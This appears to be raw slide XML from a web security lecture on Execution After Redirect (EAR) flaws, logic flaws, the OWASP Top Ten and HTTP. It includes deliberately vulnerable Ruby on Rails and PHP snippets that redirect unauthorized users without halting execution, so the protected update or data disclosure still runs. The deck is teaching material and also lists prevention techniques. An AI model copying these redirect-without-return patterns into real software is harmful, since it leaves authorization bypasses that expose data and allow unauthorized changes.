            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  def update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    @topic = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Topic.find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(params[:id])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>current_user.is_admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>redirect_to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(“/”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>topic.update_attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(params[:topic])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    flash[:notice] = “Topic updated!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1550643" y="2741169"/>
            <a:ext cx="2816669" cy="280832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>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Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182041" y="3472237"/>
            <a:ext cx="7011383" cy="280832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>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Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20969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EAR History</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>17 Common Vulnerabilities and Exposures (CVE) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starting in 2007</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Difficult to find – no consistent category</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blog post about Cake PHP 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resulted in a bug filed and documentation changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prior work on logic flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Found EAR in J2EE web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No one recognized it as a systemic logic flaw amongst web applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173984255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EARs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Benign</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No confidentiality or integrity violated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows for the unauthorized modification of the application state or discloses unauthorized data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29273865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EAR: Information Leakage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$current_user = get_current_user();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>if (!$current_user-&gt;is_admin())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	header(“Location: /”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>echo “457-55-5462”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="940055" y="2862053"/>
            <a:ext cx="4916960" cy="347988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>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84187" y="3647149"/>
            <a:ext cx="4329510" cy="347988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>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610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Prevention</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Secure design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Django, ASP.NET MVC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Terminate process or thread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ASP.NET, CakePHP, Zend, CodeIgniter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Patched Ruby on Rails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exception handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285264033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Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logic flaws come in many forms and are specific to the intended functionality and security policy of an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Received little attention </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are known to be hard to identify in automated analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not much public information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are on the rise: “…as the number of common vulnerabilities such as SQL injection and cross-site scripting are reduced, the bad guys are increasing their attacks on business logic flaws” [J. Grossman, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WhiteHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Security]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79669261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OWASP Top Ten Web Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200149"/>
            <a:ext cx="4038600" cy="3711787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the 2021 version: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Top10/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A01 Broken Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A02 Cryptographic Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A03 Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A04 Insecure Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A05 Security Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1200149"/>
            <a:ext cx="4038600" cy="3711787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A06 Vulnerable and Outdated Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A07 Identification and Authentication Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A08 Software and Data Integrity Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A09 Security Logging and Monitoring Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10 Server-Side Request Forgery (SSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422451867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Web applications have become the way in which we store and manage sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web security is different from application security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modules can be executed in any order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modules can be invoked in parallel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often times the developers of traditional applications make erroneous assumptions when developing web applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3293742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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The World-Wide Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678915" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The World-Wide Web was conceived in the early 1990s as a geographically distributed document retrieval system with a hypertext structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the past 30+ years, the Web evolved into a full-fledged platform for the execution of distributed applications that handle sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The platform is based on a browser application that can be customized on-demand using dynamically downloaded code, which usually access remote functionality using the HTTP protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2862834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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP 1.1 Host Field</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In HTTP 1.0, it is not possible to discern, from the request line which server was intended to process the request:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> HTTP/1.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a consequence it is not possible to associate multiple server “names” to the same IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In HTTP 1.1, the “Host” field is REQUIRED and specifies which server is the intended recipient:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61620196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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="817043" y="1538958"/>
            <a:ext cx="7584416" cy="2334542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7688090" y="2574436"/>
            <a:ext cx="2366754" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>xkcd.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400103438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5218" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attacking HTTP Protocol Implementations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="905219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP protocol heavily scrutinized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP protocol implementations might be erroneous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP response splitting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
